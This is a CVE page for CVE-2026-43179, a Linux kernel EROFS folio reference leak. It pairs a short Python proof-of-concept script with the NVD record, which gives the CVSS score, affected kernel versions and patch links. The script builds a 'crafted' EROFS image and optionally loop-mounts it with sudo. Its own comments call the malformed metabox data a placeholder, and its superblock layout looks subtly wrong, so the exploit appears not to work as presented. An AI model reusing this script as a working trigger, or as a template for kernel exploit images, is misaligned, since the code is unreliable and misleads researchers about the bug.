CVE-2026-43179

#!/usr/bin/env python3 # PoC for CVE-2026-43179: EROFS folio reference leak # This script creates a crafted EROFS image with invalid metabox. import struct import os # EROFS magic number EROFS_SUPER_MAGIC = 0xE0F5E1E2 def create_crafted_image(filename): with open(filename, 'wb') as f: # Write Superblock (128 bytes) # Offset 0: Magic (4 bytes) f.write(struct.pack('<I', EROFS_SUPER_MAGIC)) # Offset 4: Checksum (4 bytes) f.write(struct.pack('<I', 0)) # Offset 8: Feature_compat (4 bytes) - Enable metabox (0x00000004) f.write(struct.pack('<I', 0x00000004)) # Fill rest of superblock with zeros (simplified) f.write(b'\x00' * (128 - 12)) # Write invalid metabox data to trigger the bug # This is a placeholder for the actual complex structure required f.write(b'INVALID METABOX DATA' * 100) print(f"[+] Crafted EROFS image created: {filename}") def trigger_vulnerability(image_path): print(f"[*] Attempting to mount {image_path}...") # This requires root privileges or user namespace capabilities # In a real scenario, this would trigger the folio leak in the kernel os.system(f"sudo mount -t erofs -o loop {image_path} /mnt/erofs_test 2>&1") print("[+] If kernel is vulnerable, memory leak occurred.") if __name__ == "__main__": img_name = "crafted_erofs.img" create_crafted_image(img_name) # trigger_vulnerability(img_name) # Uncomment to run actual mount

{"cve": {"id": "CVE-2026-43179", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:36.417", "lastModified": "2026-05-12T19:48:29.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix incorrect early exits for invalid metabox-enabled images\n\nCrafted EROFS images with metadata compression enabled can trigger\nincorrect early returns, leading to folio reference leaks.\n\nHowever, this does not cause system crashes or other severe issues."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17", "versionEndExcluding": "6.18.16", "matchCriteriaId": "742E05BA-773A-4EF3-822F-A4A7DED31A65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/041b5163bb9b2e81050bcd885b3373bf2f42d5f5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/56e4a84220045b6af0f1efc11825b39217c7decf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/643575d5a4f24b23b0c54aa20aa74a4abed8ff5e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}